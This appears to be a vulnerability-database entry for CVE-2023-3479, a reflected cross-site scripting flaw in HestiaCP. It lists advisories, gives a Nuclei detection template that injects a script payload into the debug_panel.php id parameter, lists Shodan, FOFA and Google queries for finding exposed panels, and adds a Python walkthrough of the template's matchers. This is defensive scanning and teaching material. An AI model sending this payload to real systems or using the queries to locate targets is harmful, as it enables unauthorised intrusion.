| Title | Published | Views | Family |
|---|---|---|---|
| Reflected XSS | 29 Jun 2023 16:45 | – | huntr |
| CVE-2023-3479 | 30 Jun 2023 14:15 | – | circl |
| HestiaCP cross-site scripting vulnerability | 30 Jun 2023 00:00 | – | cnnvd |
| CVE-2023-3479 | 30 Jun 2023 09:55 | – | cve |
| CVE-2023-3479 Cross-site Scripting (XSS) - Reflected in hestiacp/hestiacp | 30 Jun 2023 09:55 | – | cvelist |
| CVE-2023-3479 | 30 Jun 2023 10:15 | – | nvd |
| CVE-2023-3479 Cross-site Scripting (XSS) - Reflected in hestiacp/hestiacp | 30 Jun 2023 09:55 | – | osv |
| Cross site scripting | 30 Jun 2023 10:15 | – | prion |
| PT-2023-25008 · Hestiacp · Hestiacp | 30 Jun 2023 00:00 | – | ptsecurity |
| CVE-2023-3479 | 23 May 2025 02:29 | – | redhatcve |
```yaml
id: CVE-2023-3479

info:
  name: Hestiacp <= 1.7.7 - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: |
    Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of Hestiacp (1.7.8 or higher) to mitigate this vulnerability.
  reference:
    - https://huntr.dev/bounties/6ac5cf87-6350-4645-8930-8f2876427723/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3479
    - https://github.com/hestiacp/hestiacp/commit/2326aa525a7ba14513af783f29cb5e62a476e67a
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-3479
    cwe-id: CWE-79
    epss-score: 0.01277
    epss-percentile: 0.66343
    cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: hestiacp
    product: control_panel
    shodan-query:
      - http.favicon.hash:-476299640
      - http.title:"hestia control panel"
    fofa-query:
      - title="hestia control panel"
      - icon_hash=-476299640
    google-query: intitle:"hestia control panel"
  tags: cve2023,cve,huntr,hestiacp,xss,intrusive,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - debug-panel
          - <script>alert(document.domain)</script>
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206c7cc38a43142c595219ad0600581b5ef467d8c2e8ee44cf17ceeca871ac7a3e02210098c9bd0ca19091f0f70bf316974c80b8b05d4d04799a85cd7820f9ffe6521258:922c64590222798bb761d5b6d8e72950
```
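To make explicit what the three matchers in this template require before it reports a hit, here is an added Python evaluator of the template's matcher logic (it is not Nuclei's own code), run against constructed responses. `Response` and `render_debug_panel` are assumed stand-ins for the target page; the variant that HTML-escapes the `id` parameter shows why a patched panel no longer matches, since the `<script>` word can only appear in the body when the parameter is reflected unescaped.

```python
"""Evaluate the CVE-2023-3479 template's matchers against constructed responses.
Added illustration; the matcher semantics follow the template above, with the
word-matcher default condition assumed to be "or" as in Nuclei."""
import html
from dataclasses import dataclass

PAYLOAD = '<script>alert(document.domain)</script>'

# Mirror of the template's `matchers` block (matchers-condition: and).
MATCHERS = [
    {"type": "word", "part": "body", "words": ["debug-panel", PAYLOAD], "condition": "and"},
    {"type": "word", "part": "header", "words": ["text/html"]},
    {"type": "status", "status": [200]},
]


@dataclass
class Response:          # constructed stand-in for an HTTP response
    status: int
    headers: dict
    body: str


def _match_one(m, resp):
    if m["type"] == "status":
        return resp.status in m["status"]
    # Word matchers look at the body or at the flattened "Name: value" headers.
    text = resp.body if m["part"] == "body" else "\n".join(
        f"{k}: {v}" for k, v in resp.headers.items())
    hits = [w in text for w in m["words"]]
    return all(hits) if m.get("condition", "or") == "and" else any(hits)


def template_matches(resp, matchers=MATCHERS, condition="and"):
    results = [_match_one(m, resp) for m in matchers]
    return all(results) if condition == "and" else any(results)


def render_debug_panel(param_id, escape_output):
    """Constructed page: echoes the id parameter inside an attribute value,
    either raw (the reflected-XSS behaviour) or HTML-escaped (the fix)."""
    value = html.escape(param_id, quote=True) if escape_output else param_id
    return f'<div class="debug-panel"><input value="{value}"></div>'


def check(escape_output):
    """Run the template's matchers against the page for the request in `path`."""
    injected = 'randstr"' + '>' + PAYLOAD          # id={{randstr}}"><script>...
    body = render_debug_panel(injected, escape_output)
    resp = Response(200, {"Content-Type": "text/html; charset=utf-8"}, body)
    return template_matches(resp)
```

`check(False)` returns True (unescaped reflection, the template fires); `check(True)` returns False because the escaped body contains `&lt;script&gt;` rather than the literal tag.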